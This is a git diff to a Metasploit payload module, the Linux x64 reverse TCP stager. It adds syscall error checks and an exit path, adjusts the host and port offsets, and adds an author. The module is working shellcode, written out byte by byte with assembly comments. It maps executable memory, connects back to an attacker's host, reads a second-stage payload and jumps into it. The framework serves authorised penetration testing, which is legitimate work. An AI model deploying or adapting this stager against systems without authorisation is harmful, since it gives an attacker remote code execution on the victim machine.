diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index f398543e27..5be3330990 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -17,7 +17,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Reverse TCP Stager', 'Description' => 'Connect back to the attacker', - 'Author' => 'ricky', + 'Author' => ['ricky', 'tkmru'], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X64, @@ -26,8 +26,8 @@ module MetasploitModule { 'Offsets' => { - 'LHOST' => [ 45, 'ADDR' ], - 'LPORT' => [ 43, 'n' ], + 'LHOST' => [ 55, 'ADDR' ], + 'LPORT' => [ 53, 'n' ], }, 'Payload' => "\x48\x31\xff" + # xor %rdi,%rdi @@ -42,6 +42,8 @@ module MetasploitModule "\xb2\x07" + # mov $0x7,%dl "\x0f\x05" + # syscall # mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) + "\x48\x85\xc0" + # test %rax,%rax + "\x78\x3c" + # js 40012c "\x56" + # push %rsi "\x50" + # push %rax "\x6a\x29" + # pushq $0x29 @@ -53,6 +55,8 @@ module MetasploitModule "\x5e" + # pop %rsi "\x0f\x05" + # syscall # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) + "\x48\x85\xc0" + # test %rax,%rax + "\x78\x29" + # js 40012c "\x48\x97" + # xchg %rax,%rdi "\x48\xb9\x02\x00" + # movabs $0x100007fb3150002,%rcx "\x15\xb3" + # LPORT @@ -65,12 +69,23 @@ module MetasploitModule "\x58" + # pop %rax "\x0f\x05" + # syscall # connect(3, {sa_family=AF_INET, LPORT, LHOST, 16) + "\x48\x85\xc0" + # test %rax,%rax + "\x78\x0c" + # js 40012c "\x59" + # pop %rcx "\x5e" + # pop %rsi "\x5a" + # pop %rdx "\x0f\x05" + # syscall # read(3, "", 4096) - "\xff\xe6" # jmpq *%rsi + "\x48\x85\xc0" + # test %rax,%rax + "\x78\x02" + # js 40012c + "\xff\xe6" + # jmpq *%rsi + # 40012c : + "\x6a\x3c" + # pushq $0x3c + "\x58" + # pop %rax + "\x6a\x01" + # pushq $0x1 + "\x5f" + # pop %rdi + "\x0f\x05" #syscall + # exit(1) } )) end